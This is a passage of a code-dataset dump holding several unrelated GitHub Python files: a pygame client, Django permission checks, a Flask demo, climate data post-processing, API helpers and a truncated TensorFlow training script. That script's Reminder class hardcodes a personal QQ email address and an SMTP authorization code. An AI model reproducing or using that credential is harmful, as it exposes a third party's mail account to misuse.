pressed[pygame.K_RIGHT]:\n game.tileSize /= 1.1\n game.tileSize = round(game.tileSize)\n if pressed[pygame.K_DOWN]:\n game.fly = False\n if pressed[pygame.K_w]:\n if game.vy >= -speedlimit:\n game.vy -= 0.02\n if pressed[pygame.K_s]:\n if game.vy <= speedlimit:\n game.vy += 0.02\n if pressed[pygame.K_a]:\n if game.vx >= -speedlimit:\n game.vx -= 0.02\n if pressed[pygame.K_d]:\n if game.vx <= speedlimit:\n game.vx += 0.02\n # if pressed[pygame.K_ESCAPE]:\n # pygame.event.set_grab(False)\n # pygame.mouse.set_visible(True)\n # grab = False\n if abs(game.vx) < 0.02:\n game.vx = 0\n if game.vx < -speedlimit:\n game.vx = -speedlimit\n if game.vx > speedlimit:\n game.vx = speedlimit\n if game.vx > 0 and not pressed[pygame.K_d]:\n game.vx -= 0.02\n if game.vx < 0 and not pressed[pygame.K_a]:\n game.vx += 0.02\n\n if abs(game.vy) < 0.02:\n game.vy = 0\n if game.vy < -speedlimit:\n game.vy = -speedlimit\n if game.vy > speedlimit:\n game.vy = speedlimit\n if game.vy > 0 and not pressed[pygame.K_s]:\n game.vy -= 0.02\n if game.vy < 0 and not pressed[pygame.K_w]:\n game.vy += 0.02\n\n userSize = 0.5\n\n nx = math.floor(game.mx)\n ny = math.floor(game.my)\n\n minX = game.mx - 1.0\n maxX = game.mx + 1.0\n minY = game.my - 1.0\n maxY = game.my + 1.0\n if not game.fly:\n if (game.world.cell(nx - 1, ny)[0] or\n game.my - ny < userSize / 2 and game.world.cell(nx - 1, ny - 1)[0] or\n game.my - ny > 1 - userSize / 2 and game.world.cell(nx - 1, ny + 1)[0]):\n\n minX = nx + userSize / 2\n if (game.world.cell(nx + 1, ny)[0] or\n game.my - ny < userSize / 2 and game.world.cell(nx + 1, ny - 1)[0] or\n game.my - ny > 1 - userSize / 2 and game.world.cell(nx + 1, ny + 1)[0]):\n\n maxX = nx + 1 - userSize / 2\n\n if (game.world.cell(nx, ny - 1)[0] or\n game.mx - nx < userSize / 2 and game.world.cell(nx - 1, ny - 1)[0] or\n game.mx - nx > 1 - userSize / 2 and game.world.cell(nx + 1, ny - 1)[0]):\n\n minY = ny + userSize / 2\n if (game.world.cell(nx, ny + 1)[0] or\n game.mx - nx < userSize / 2 and game.world.cell(nx - 1, ny + 1)[0] or\n game.mx - nx > 1 - userSize / 2 and game.world.cell(nx + 1, ny + 1)[0]):\n\n maxY = ny + 1 - userSize / 2\n\n game.mx += game.vx\n game.my += game.vy\n\n game.mx = min(maxX, max(minX, game.mx))\n game.my = min(maxY, max(minY, game.my))\n\n game.protocol.callRemote(UpdateUserPosition, user=game.username, x=game.mx, y=game.my)\n\n halfX = math.floor(0.6 * game.sizex / game.tileSize)\n halfY = math.floor(0.6 * game.sizey / game.tileSize)\n\n px, py = pygame.mouse.get_pos()\n px = max(px, game.sizex / 2.0 - 3.0 * game.tileSize)\n px = min(px, game.sizex / 2.0 + 3.0 * game.tileSize)\n py = max(py, game.sizey / 2.0 - 3.0 * game.tileSize)\n py = min(py, game.sizey / 2.0 + 3.0 * game.tileSize)\n if pygame.event.get_grab():\n pygame.mouse.set_pos((px, py))\n oxRaw, oyRaw = pixelToGame((px, py))\n ox = math.floor(oxRaw)\n oy = math.floor(oyRaw)\n if pressed[pygame.K_1]:\n game.slotMaterial = 1\n if pressed[pygame.K_2]:\n game.slotMaterial = 2\n\n if pressed[pygame.K_SPACE]:\n game.world.updateMaterial(ox, oy, game.slotMaterial)\n\n if pressed[pygame.K_b]:\n game.world.updateMaterial(ox, oy, 0)\n\n for x in range(-halfX, halfX + 1):\n for y in range(-halfY, halfY + 1):\n (material, delta) = game.world.cell(nx + x, ny + y)\n if material == 0:\n color = list(GRASS)\n elif material == 1:\n color = list(STONE)\n elif material == 2:\n color = list(BEDROCK)\n for i in range(3):\n color[i] += delta\n color[i] = min(255, max(0, color[i]))\n tx, ty = gameToPixel((nx + x, ny + y))\n pygame.draw.rect(\n game.screen, color,\n pygame.Rect(tx, ty, game.tileSize, game.tileSize))\n ux, uy = gameToPixel((game.mx, game.my))\n pygame.draw.rect(\n game.screen, (0, 0, 0),\n pygame.Rect(\n ux - game.tileSize / 2 / 2.0,\n uy - game.tileSize / 2 / 2.0,\n game.tileSize / 2, game.tileSize / 2))\n\n for user, pos in game.playerPositions.items():\n if user != game.username:\n playerX, playerY = gameToPixel(pos)\n pygame.draw.rect(\n game.screen, (200, 0, 0),\n pygame.Rect(\n playerX - game.tileSize / 2 / 2,\n playerY - game.tileSize / 2 / 2,\n game.tileSize / 2, game.tileSize / 2))\n boxX, boxY = gameToPixel((ox, oy))\n pygame.draw.rect(\n game.screen, (0, 0, 0),\n pygame.Rect(\n boxX, boxY,\n game.tileSize, game.tileSize\n ), 1)\n pygame.draw.line(\n game.screen, (0, 0, 0),\n (px - 4, py),\n (px + 4, py))\n pygame.draw.line(\n game.screen, (0, 0, 0),\n (px, py - 4),\n (px, py + 4))\n\n x = game.font.render(str(round(game.mx)), False, (0, 0, 0))\n y = game.font.render(str(round(game.my)), False, (0, 0, 0))\n x2 = game.font.render(\"X:\", False, (0, 0, 0))\n y2 = game.font.render(\"Y:\", False, (0, 0, 0))\n\n game.screen.blit(x, (35, 0))\n game.screen.blit(x2, (0, 0))\n game.screen.blit(y, (35, 25))\n game.screen.blit(y2, (0, 25))\n pygame.display.flip()\n\n\ndef startGame(username, host, port, world, seed):\n from twisted.python.log import startLogging\n from sys import stdout\n\n startLogging(stdout)\n\n game.username = username\n game.host = host\n game.port = port\n game.worldName = world\n game.seed = seed\n\n pygame.init()\n pygame.font.init()\n game.sizex = 500\n game.sizey = 500\n game.startScreenLoop = LoopingCall(gamestart)\n game.startScreenLoop.start(1.0 / DESIRED_FPS)\n\n reactor.listenMulticast(8005, MulticastPingClient(), listenMultiple=True)\n reactor.run()\n","repo_name":"jeffbaumes/make-a-game","sub_path":"src/make_a_game/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":13532,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"24296401494","text":"from rest_framework import permissions\nfrom rest_framework_jwt.utils import jwt_decode_handler\nfrom django.shortcuts import redirect,render\n\n\nclass IsDaily(permissions.BasePermission):\n \"\"\"\n Custom permission to only allow owners of an object to edit it.\n \"\"\"\n\n def has_permission(self, request, view):\n # Read permissions are allowed to any request\n token = request.META.get(\"HTTP_AUTHORIZATION\").split(' ')\n a = jwt_decode_handler(token[2])\n if a['role'] == 1:\n if request.method == 'POST':\n return True\n elif request.method == 'GET':\n return True\n else:\n return False\n elif a['role'] == 2 or a['role'] == 7:\n if request.method == 'POST':\n return False\n elif request.method == 'GET':\n return True\n else:\n return False\n else:\n print (\"xsxs\")\n return False\n\n\nclass IsHarry(permissions.BasePermission):\n \"\"\"\n Custom permission to only allow owners of an object to edit it.\n \"\"\"\n\n def has_permission(self, request, view):\n token = request.META.get(\"HTTP_AUTHORIZATION\").split(' ')\n trole = jwt_decode_handler(token[2])\n if trole['role'] == 2:\n return True\n else:\n if request.method == 'GET':\n return True\n return False\n\n","repo_name":"haominqu/pythoncrm","sub_path":"pythoncrm/daily/permissions.py","file_name":"permissions.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21063034946","text":"from time import time, sleep\nfrom contextlib import contextmanager\nimport subprocess\n\nCONFIG_YAML = \"\"\"\\\nlisten: localhost:14877\nroutes:\n GET /now:\n command: echo hello world\n\"\"\"\n\ndef wait_for_url(url):\n t0 = time()\n while True:\n try:\n subprocess.check_call(['curl', '-s', url])\n return\n except subprocess.CalledProcessError:\n if time() - t0 < 3:\n sleep(.1)\n else:\n raise\n\n@contextmanager\ndef server(config_yaml):\n p = subprocess.Popen(\n ['python', 'csi.py', str(config_yaml)],\n stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT,\n )\n wait_for_url('http://localhost:14877')\n\n try:\n yield\n\n finally:\n p.terminate()\n out, _ = p.communicate()\n print(out.decode('utf-8'))\n p.wait()\n\ndef test_serve(tmpdir):\n config_yaml = tmpdir / 'config.yaml'\n config_yaml.write(CONFIG_YAML)\n with server(config_yaml):\n url = 'http://localhost:14877/now'\n content = subprocess.check_output(['curl', '-s', url])\n assert content == b'hello world\\n'\n","repo_name":"mgax/csi","sub_path":"testsuite/test_serve.py","file_name":"test_serve.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5872790494","text":"#3)Overriding\r\nprint(\"****Method Overriding*****\")\r\n\"\"\"What ever members available in the parent class are bydefault available to the child\r\nclass through inheritance. If the child class not satisfied with parent class\r\nimplementation then child class is allowed to redefine that method in the child class\r\nbased on its requirement. This concept is called overriding.\r\n--->Overriding concept applicable for both methods and constructors. \"\"\"\r\nclass P:\r\n def property(self):\r\n print(\"Gold+Land+Cash\")\r\n def marry(self):\r\n print(\"AMB\")\r\nclass C(P):\r\n def marry(self):\r\n print(\"Arr\")\r\n\r\nc=C()\r\nc.property()\r\nc.marry()\r\n\r\nprint(\"***Constructor Overriding*****\")\r\nclass Father:\r\n def __init__(self):\r\n print(\"Father Constructor\")\r\nclass Me(Father):\r\n def __init__(self):\r\n print(\"My constructor\")\r\nm=Me()\r\n\r\nprint(\"***to call Parent Class Constructor by using super()*****\")\r\nclass Person:\r\n def __init__(self,name,age):\r\n self.name=name\r\n self.age=age\r\nclass Employee(Person):\r\n def __init__(self,name,age,eno,esal):\r\n super().__init__(name,age)\r\n self.eno=eno\r\n self.esal=esal\r\n def display(self):\r\n print(\"Emp name : \",self.name)\r\n print(\"Emp Age : \",self.age)\r\n print(\"Emp eno : \",self.eno)\r\n print(\"Emp esal : \",self.esal)\r\n\r\ne=Employee(\"venky\",24,101,55000)\r\ne.display()\r\nprint(\"\\n\")\r\ne1=Employee(\"Ravi\",25,102,60000)\r\ne1.display()\r\nprint(\"\\n\")\r\ne2=Employee(\"Hari\",26,103,50000)\r\ne2.display()\r\n","repo_name":"VenkyGajula/Python_Advance_OOPS","sub_path":"overriding.py","file_name":"overriding.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43080768274","text":"\"\"\"\nPost-processing analysis on T_ref and phi_eff to produce pretty plots for diagnostic and publication purposes.\n\"\"\"\n\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport xarray as xr\nimport pandas as pd\nfrom scipy import fft, fftpack\nfrom scipy.stats import skew\nfrom matplotlib.colors import LogNorm\nimport joypy\nimport cartopy.crs as ccrs\nfrom descriptors import cachedproperty\nfrom distributed.client import _get_global_client\n\nclass SingleModelPostProcessor(object):\n \"\"\" Post-processing routines for analysis of climate models and reanalysis\n with T-prime, effective latitude and surface temperature data\n \"\"\"\n\n def __init__(self,\n path_to_input_files,\n chunks={'time': 1},\n diagnostic_var='t_prime',\n season='DJF'):\n self.chunks = chunks\n self.path_to_files = path_to_input_files\n self.season = season\n self.var = diagnostic_var\n\n @staticmethod\n def sel_winters(data,start_year=2015,end_year=2100):\n winters = pd.date_range('%i-12-01'%start_year,'%i-02-28'%(start_year+1),freq='D')\n for i in range(start_year+1,end_year):\n begin = i\n end = i+1\n winters=winters.union(pd.date_range('%i-12-01'%begin,'%i-02-28'%end,freq='D'))\n try:\n selected = data.sel(time=winters)\n except KeyError: # if my last year doesn't have JF\n winters = winters.drop(pd.date_range('%i-01-01'%end_year,\n '%i-02-28'%end_year,\n freq='D'\n )\n )\n selected = data.sel(time=winters)\n return selected\n\n @cachedproperty\n def dataset(self):\n\n client = _get_global_client()\n if client is None:\n print(f'WARNING! No Dask client available in environment!')\n\n _full_dataset = xr.open_mfdataset(self.path_to_files,\n chunks=self.chunks,\n concat_dim='time',\n preprocess=self.preprocess_mf)\n self.year_range = np.unique(_full_dataset.time.dt.year)[[0,-1]]\n if self.season == 'DJF':\n try:\n _full_dataset['time'] = _full_dataset.indexes['time'].normalize()\n except AttributeError:\n _full_dataset['time'] = _full_dataset.indexes['time'].to_datetimeindex().normalize()\n _dataset=self.sel_winters(_full_dataset,*self.year_range)\n return _dataset\n elif season == 'all':\n return _full_dataset\n else:\n raise NotImplementedError\n\n @staticmethod\n def preprocess_mf(array):\n var = list(array.variables.keys())[-1]\n if var not in ['eff_lat','t_prime','t_ref', 'tas']:\n array = array.rename({var: 'eff_lat'})\n var='eff_lat'\n array_filter = array.where(array[var] != 0)\n array_new = array_filter.sortby('time')\n return array_new\n\n @staticmethod\n def demean(data, decade=False):\n \"\"\" Calculate demeaned anomaly with daily and decadal baselines\n\n This function calculates the demeaded temperature by either calculating\n a day-of-the-year baseline mean, by default, or by calculating a decade mean.\n This operation is grid-based, so it is calculating daily and decade\n means. \n\n Parameters\n ---------\n - decade bool: Demean by decades. Default is `False`.\n\n Returns\n ------\n xr.Dataset\n \"\"\"\n\n if decade:\n #data = data.assign_coords(year=('time',\n # group_into_winters(data.time)))\n decade_day_idx = pd.MultiIndex.from_arrays(\n [((data.time.dt.year//10)*10).data,\n data.time.dt.dayofyear.data])\n data.coords['decade_day'] = ('time', decade_day_idx)\n grp_by = 'decade_day'\n else:\n grp_by = 'time.dayofyear'\n\n xr_mean = (data.\n groupby(grp_by).\n mean()\n )\n\n demeaned = data.groupby(grp_by) - xr_mean\n return demeaned.drop('decade_day',errors='ignore')\n\n def demeaned_shift(self, data, decade=False):\n \"\"\" Shifted demeaned effective latitude\n\n This function takes the effective latitude data, demeans it, and adds back\n the real latitude to get an infomative measurement of effective\n latitude instead of an anomaly.\n\n Returns\n -------\n xr.Dataset\n \"\"\"\n\n demeaned_array = self.demean(data, decade=decade)\n demeaned_shift = demeaned_array + data.lat\n\n return demeaned_shift\n\n def stats_calc(self,data):\n try:\n data = data.drop('expver')\n except ValueError:\n pass\n mean = data.mean(dim='time')[self.var]\n std = data.std(dim='time')[self.var]\n skewness = xr.DataArray(\n data=skew(data[self.var], nan_policy='omit'),\n dims=mean.dims,\n coords=mean.coords\n )\n #statistics = xr.Dataset(dict(stats=(\n # ['stat','lat','lon'],[\n # mean,\n # std,\n # xr.ones_like(mean)*skewness\n # ])\n # ),\n # coords={'stat':['mean','std','skewness'],\n # 'lat':mean.lat,'lon':mean.lon}\n # )\n statistics=xr.concat(\n [mean,std,skewness],#skewness*xr.ones_like(mean)],\n dim='stat'\n ).assign_coords({'stat':['mean','std','skew']})\n return statistics\n\n def diagnostic_stats(self,demean=False):\n data=self.dataset\n present = (self.year_range[0],self.year_range[0]+10)\n future = (self.year_range[-1]-10,self.year_range[-1])\n self.data_present = self.sel_winters(data,*present)\n self.data_future = self.sel_winters(data,*future)\n\n if demean:\n try:\n data_present_dm = self.data_present_dm\n data_future_dm = self.data_future_dm\n except AttributeError:\n data_present_dm = self.demean(self.data_present)\n data_future_dm = self.demean(self.data_future)\n self.stats_present = self.stats_calc(data_present_dm)\n self.stats_future = self.stats_calc(data_future_dm)\n self.stats_diff = self.stats_future - self.stats_present\n\n else:\n self.stats_present = self.stats_calc(self.data_present)\n self.stats_future = self.stats_calc(self.data_future)\n self.stats_diff = self.stats_future - self.stats_present\n\n def diagnostic_plot(self, demean=False, path_to_save=\"./\"):\n self.diagnostic_stats(demean=demean)\n xr_all = xr.concat([\n self.stats_present,\n self.stats_future,\n self.stats_diff],\n dim='period').assign_coords({\n 'period':['first_decade','last_decade','difference']\n })\n xr_all.to_netcdf(path_to_save+'_statistics.nc4')\n print('plotting...')\n p = xr_all.sel(stat='mean').plot.imshow(\n transform=ccrs.PlateCarree(),\n col='period',\n subplot_kws={\n 'projection':ccrs.Orthographic(20, 90)\n }\n )\n for ax in p.axes.flat:\n ax.coastlines()\n ax.gridlines()\n plt.savefig(path_to_save+'_mean.png')\n p = xr_all.sel(stat='std').plot.imshow(\n transform = ccrs.PlateCarree(),\n col='period',\n subplot_kws={\n 'projection': ccrs.Orthographic(20, 90)\n }\n )\n for ax in p.axes.flat:\n ax.coastlines()\n ax.gridlines()\n plt.savefig(path_to_save+'_std.png')\n p = xr_all.sel(stat='skew').plot.imshow(\n transform=ccrs.PlateCarree(),\n col='period',\n subplot_kws={\n 'projection':ccrs.Orthographic(20, 90)\n }\n )\n for ax in p.axes.flat:\n ax.coastlines()\n ax.gridlines()\n plt.savefig(path_to_save+'_skew.png')\n\n\n#---- helper functions ----#\ndef run_demeaning(path_processed,\n shortname,\n path_postproc,\n var_of_interest,\n decade=False):\n #create class\n single = SingleModelPostProcessor(path_to_input_files=path_processed,\n diagnostic_var=var_of_interest,\n season='DJF')\n #demean or shift\n filename=path_postproc+f'{shortname}_{var_of_interest}_demeaned.nc4'\n single.demean(single.dataset[var_of_interest],decade=decade\n ).rename(f'dm_{var_of_interest}').to_netcdf(filename)\n #elif var_of_interest == 'eff_lat':\n # filename=path_postproc+f'{shortname}_{var_of_interest}_demeaned_shifted.nc4'\n # single.demeaned_shift(single.dataset,\n # decade=decade).rename({var_of_interest: 'phi_eq_prime'}\n # ).to_netcdf(filename)\n return single\n\ndef group_into_winters(dates):\n year_arr = np.zeros(len(dates),dtype=int)\n y=0\n for date in dates:\n if date.dt.month <= 3:\n year_arr[y] = date.dt.year - 1\n else:\n year_arr[y] = date.dt.year\n y+=1\n return year_arr\n","repo_name":"geosciences-data-practicum/reanalysis_getter","sub_path":"jetstream/post_proc.py","file_name":"post_proc.py","file_ext":"py","file_size_in_byte":9546,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"4070493248","text":"import os\nfrom typing import Dict, Optional\n\nfrom idoitapi.Request import Request\nfrom idoitapi.APIException import JSONRPC\nfrom idoitapi.CMDBObject import CMDBObject\nfrom idoitapi.CMDBObjects import CMDBObjects\nfrom idoitapi.CMDBCategory import CMDBCategory\nfrom idoitapi.utils import base64_encode\n\n\nclass File(Request):\n \"\"\"\n Requests for assigned files\n \"\"\"\n\n def add(self, object_id: int, file_path: str, description: Optional[str] = None) -> None:\n \"\"\"\n Add a new file to a specific object.\n A new file object will be created and assigned to the specific object.\n\n :param int object_id: Object identifier\n :param str file_path: Path to file\n :param str description: (Optional) description\n :raises: :py:exc:`~idoitapi.APIException.APIException` on error\n :raises: :py:exc:`OSError` if file not found or unreadable\n \"\"\"\n file_object_id = CMDBObject(self._api).create(\n 'C__OBJTYPE__FILE',\n description if description is not None else ''\n )\n\n cmdb_category = CMDBCategory(self._api)\n\n cmdb_category.create(\n file_object_id,\n 'C__CATS__FILE_VERSIONS',\n {\n 'file_content': base64_encode(file_path),\n 'file_physical': os.path.basename(file_path),\n 'file_title': description,\n 'version_description': description\n }\n )\n\n cmdb_category.create(\n object_id,\n 'C__CATG__FILE',\n {\n 'file': file_object_id\n },\n )\n\n def batch_add(self, object_id: int, files: Dict) -> None:\n \"\"\"\n Add multiple new files to a specific object.\n New file objects will be created and assigned to the specific object.\n\n :param int object_id: Object identifier\n :param dict files: Dict (key: path to file; value: description)\n :raises: :py:exc:`~idoitapi.APIException.APIException` on error\n :raises: :py:exc:`OSError` if any file not found or unreadable\n \"\"\"\n objects = []\n\n for description in files.values():\n objects.append({\n 'type': 'C__OBJTYPE__FILE',\n 'title': description,\n })\n\n file_object_ids = CMDBObjects(self._api).create(objects)\n\n if len(file_object_ids) != len(files):\n raise JSONRPC(\n message='Wanted to create {} file object(s) but got {} object identifiers'.format(\n len(files), len(file_object_ids)\n )\n )\n\n requests = []\n\n counter = 0\n\n for file_path, description in files.items():\n requests.append({\n 'method': 'cmdb.category.create',\n 'params': {\n 'objID': file_object_ids[counter],\n 'catsID': 'C__CATS__FILE_VERSIONS',\n 'data': {\n 'file_content': base64_encode(file_path),\n 'file_physical': os.path.basename(file_path),\n 'file_title': description,\n 'version_description': description\n }\n }\n })\n\n requests.append({\n 'method': 'cmdb.category.create',\n 'params': {\n 'objID': object_id,\n 'catgID': 'C__CATG__FILE',\n 'data': {\n 'file': file_object_ids[counter],\n }\n }\n })\n\n counter += 1\n\n self._api.batch_request(requests)\n","repo_name":"mvorl/i-doit_API","sub_path":"idoitapi/File.py","file_name":"File.py","file_ext":"py","file_size_in_byte":3670,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"2338784122","text":"from ctypes import *\nimport gi\nimport platform\nimport os\nimport json\nimport logging\nfrom adaflow.av.utils import NumpyArrayEncoder\n\ngi.require_version('GstVideo', '1.0')\ngi.require_version('GstAudio', '1.0')\ngi.require_version('GLib', '2.0')\ngi.require_version('Gst', '1.0')\n\nlogger = logging.getLogger(\"JSONMetadata\")\nsys_platform = platform.platform().lower()\n\nif \"macos\" in sys_platform or \"darwin\" in sys_platform:\n libgst = CDLL(os.getenv(\"LIB_GSTREAMER_PATH\", \"libflow_gst_plugin.dylib\"))\nelif \"linux\" in sys_platform:\n libgst = CDLL(os.getenv(\"LIB_GSTREAMER_PATH\", \"libflow_gst_plugin.so\"))\nelse:\n print(\"other platform\")\n\n\nclass FLOWJSONMeta(Structure):\n _fields_ = [('_meta_flags', c_int),\n ('_info', c_void_p),\n ('_message', c_char_p)]\n\n\nFLOWJSONMetaPtr = POINTER(FLOWJSONMeta)\n\nlibgst.gst_buffer_add_json_info_meta.argtypes = [c_void_p, c_char_p]\nlibgst.gst_buffer_add_json_info_meta.restype = c_void_p\n\nlibgst.gst_buffer_get_json_info_meta.argtypes = [c_void_p]\nlibgst.gst_buffer_get_json_info_meta.restype = c_char_p\n\nlibgst.gst_buffer_remove_json_info_meta.argtypes = [c_void_p]\nlibgst.gst_buffer_remove_json_info_meta.restype = c_bool\n\n\ndef flow_meta_add(buffer, message):\n # Writes json message to Gst.Buffer\n _ = libgst.gst_buffer_add_json_info_meta(hash(buffer), message)\n\n\ndef flow_meta_get(buffer):\n # Gets json message to Gst.Buffer\n res = libgst.gst_buffer_get_json_info_meta(hash(buffer))\n return res.decode('utf-8')\n\n\ndef flow_meta_remove(buffer):\n # Removes json message to Gst.Buffer\n libgst.gst_buffer_remove_json_info_meta(hash(buffer))\n\n\ndef flow_meta_add_key(buffer, message, meta_key):\n # Writes json message to Gst.Buffer with meta_key\n get_message_str = flow_meta_get(buffer)\n\n # first-to-add-metadata\n if get_message_str == \"NULL\":\n json_key_v = dict()\n json_key_v[meta_key] = message\n json_message = json.dumps(json_key_v, cls=NumpyArrayEncoder)\n flow_meta_add(buffer, json_message.encode('utf-8'))\n else:\n get_message = json.loads(get_message_str)\n if meta_key in get_message:\n logger.error('%s is duplicate definition, change a new key ' % meta_key)\n else:\n get_message[meta_key] = message\n json_message = json.dumps(get_message, cls=NumpyArrayEncoder)\n flow_meta_remove(buffer)\n flow_meta_add(buffer, json_message.encode('utf-8'))\n","repo_name":"zcloud-jzy/AdaFlow","sub_path":"modules/adaflow-python/src/adaflow/av/metadata/flow_json_meta.py","file_name":"flow_json_meta.py","file_ext":"py","file_size_in_byte":2451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21571444842","text":"'''\nThis is a simple demo server that calls the pace microservice after a user submits data to a form.\n'''\n\nfrom flask import Flask, request, render_template_string\nimport requests\n\napp = Flask(__name__)\n\n# HTML template for the form\nFORM_TEMPLATE = \"\"\"\n\n\n\n Pace Calculator\n\n\n

Pace Calculator

\n
\n Distance (in kilometers):
\n Duration (in minutes):
\n \n
\n\n\n\"\"\"\n\n\n@app.route(\"/\")\ndef index():\n return render_template_string(FORM_TEMPLATE)\n\n\n@app.route(\"/submit_data\", methods=[\"POST\"])\ndef submit_data():\n distance = request.form.get(\"distance\")\n duration = request.form.get(\"duration\")\n\n # Prepare the data for the POST request\n data = {\"distance\": distance, \"duration\": duration}\n\n # Make a POST request to the microservice server\n response = requests.post(\"http://localhost:5001/calculate_pace\", json=data)\n\n pace_data = response.json()\n print(f\"\\nGot response. \\n Data: {pace_data} \\n\")\n pace = round(pace_data.get(\"pace\"), 2)\n\n return f\"Your pace is {pace} minutes per kilometer\"\n\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", port=5000)\n","repo_name":"JHarrisonOSU/Pace-Calculator-Microservice","sub_path":"Demo Server/Demo_Server.py","file_name":"Demo_Server.py","file_ext":"py","file_size_in_byte":1364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11315871055","text":"def singleNumber(nums) -> int:\n \"\"\"\n Given a non-empty array of integers nums, every element appears twice except for one. Find that single one.\n\n Follow up: Could you implement a solution with a linear runtime complexity and without using extra memory?\n >>> singleNumber([2,2,1])\n 1\n >>> singleNumber([4,1,2,1,2])\n 4\n >>> singleNumber([1])\n 1\n\n \"\"\"\n a = 0\n for i in nums:\n a ^= i\n return a\n\n\nif __name__ == '__main__':\n import doctest\n doctest.testmod(verbose=True)\n","repo_name":"AlexVines/my_leetcode_solutions","sub_path":"single_num.py","file_name":"single_num.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7843852977","text":"from odoo import http\nfrom splashpy import Framework\n\n\nclass CurrencyHelper:\n \"\"\"Collection of Static Functions to manage Odoo Currencies\"\"\"\n\n domain = \"res.currency\"\n\n @staticmethod\n def get_main_currency():\n try:\n company = http.request.env['res.company']._get_main_company().read([])\n return CurrencyHelper.load(company[0][\"currency_id\"][0])\n except:\n return None\n\n @staticmethod\n def get_main_currency_code():\n try:\n company = http.request.env['res.company']._get_main_company().read([])\n return company[0][\"currency_id\"][1]\n except Exception as exception:\n Framework.log().fromException(exception)\n return None\n\n @staticmethod\n def get_main_currency_id():\n try:\n company = http.request.env['res.company']._get_main_company().read([])\n return company[0][\"currency_id\"][0]\n except Exception as exception:\n Framework.log().fromException(exception)\n return None\n\n # ====================================================================#\n # Odoo ORM Access\n # ====================================================================#\n\n @staticmethod\n def load(currency_id):\n \"\"\"Load Odoo Object by Id\"\"\"\n currency = CurrencyHelper.getModel().browse([int(currency_id)])\n if len(currency) != 1:\n return False\n\n return currency\n\n @staticmethod\n def getModel():\n \"\"\"Get Currencies Model Class\"\"\"\n return http.request.env[CurrencyHelper.domain].sudo()\n","repo_name":"SplashSync/Odoo","sub_path":"odoo/addons/splashsync/helpers/objects/currency.py","file_name":"currency.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8610793607","text":"import os, glob\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\nimport tensorflow as tf\nfrom tensorflow.keras import layers, optimizers, datasets, Sequential\nimport datetime\n# from resnet import resnet18\nfrom keras_squeeze_excite_network.se_resnet import SEResNet18\nimport cv2\nfrom PIL import Image\nimport numpy as np\nimport pandas as pd\nfrom tqdm import tqdm\nimport argparse\nimport torch\nimport random, csv\nimport smtplib\nfrom email.mime.text import MIMEText\nfrom email.header import Header\n\ndevices = tf.config.experimental.list_physical_devices('GPU')\n# tf.config.experimental.set_memory_growth(devices[0], True)\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\n# tf.random.set_seed(2345)\ncurrent_time = datetime.datetime.now().strftime(('%Y-%m-%d_%H:%M:%S'))\nlog_dir = 'logs/' + current_time\nsummary_writer = tf.summary.create_file_writer(log_dir)\nos.makedirs('weights', exist_ok=True)\n\n# 打开图片并将图片像素以矩阵的形式保存到列表里\n# def import_dataset(csv_file):\n# datas=[]\n\n# file = pd.read_csv(r'af2020cv-2020-05-09-v5-dev/'+csv_file)\n# data = file['FileID'] # 获取名字为flow列的数据\n# list = data.values.tolist() # 将csv文件中flow列中的数据保存到列表中\n\n# for path in tqdm(list):\n# # change_size('af2020cv-2020-05-09-v5-dev/data/'+path+'.jpg')\n# datas.append(np.array(Image.open('af2020cv-2020-05-09-v5-dev/data/'+ path +'.jpg', 'r')))\n\n# datas=np.array(datas)\n# label = file['SpeciesID']\n# labels = label.values.tolist()\n# labels =np.array(labels).reshape(len(labels),1)\n\n# return datas, labels\n\n\n# # 将待测试照片大小转化为32*32*3\n# def change_size(path):\n# img = cv2.imread(path)\n# # print(img)\n# width = 224\n# height = 224\n# dim = (width, height)\n\n# # resize image\n# resized = cv2.resize(img, dim)\n# cv2.imwrite(path, resized)\n\n\n# def preprocess(x, y):\n# # [0~1]\n# x = 2 * tf.cast(x, dtype=tf.float32) / 255. - 1\n# y = tf.cast(y, dtype=tf.int32)\n# return x, y\n\n\nassert tf.__version__.startswith('2.')\n\n\nclass Reminder:\n def __init__(self, qq=None, register=None):\n \"\"\"\n :param qq: 发送的qq账号\n :param register: qq邮箱授权吧\n \"\"\"\n self.qq = qq\n self.register = register\n self.server = smtplib.SMTP_SSL(\"smtp.qq.com\", 465)\n\n def send(self, title, detail):\n \"\"\"\n send message\n :param title: the title of the message\n :param detail: the detail of the message\n \"\"\"\n sender = self.qq\n receivers = self.qq\n message = MIMEText(detail, 'plain', 'utf-8')\n message['Subject'] = Header(title, 'utf-8')\n message['From'] = sender\n message['To'] = receivers\n try:\n self.server = smtplib.SMTP_SSL(\"smtp.qq.com\", 465)\n self.server.login(sender, self.register)\n self.server.sendmail(sender, receivers, message.as_string())\n self.server.quit()\n except smtplib.SMTPException as e:\n print(e)\n\n def _register(self):\n self.qq = '434596665@qq.com'\n self.register = 'qbcomikcojwubgca'\n\n\ndef load_csv(root, filename):\n images, labels = [], []\n # read from csv file\n with open(os.path.join(root, filename), 'r') as f:\n reader = csv.reader(f)\n next(reader)\n for row in tqdm(reader):\n img, 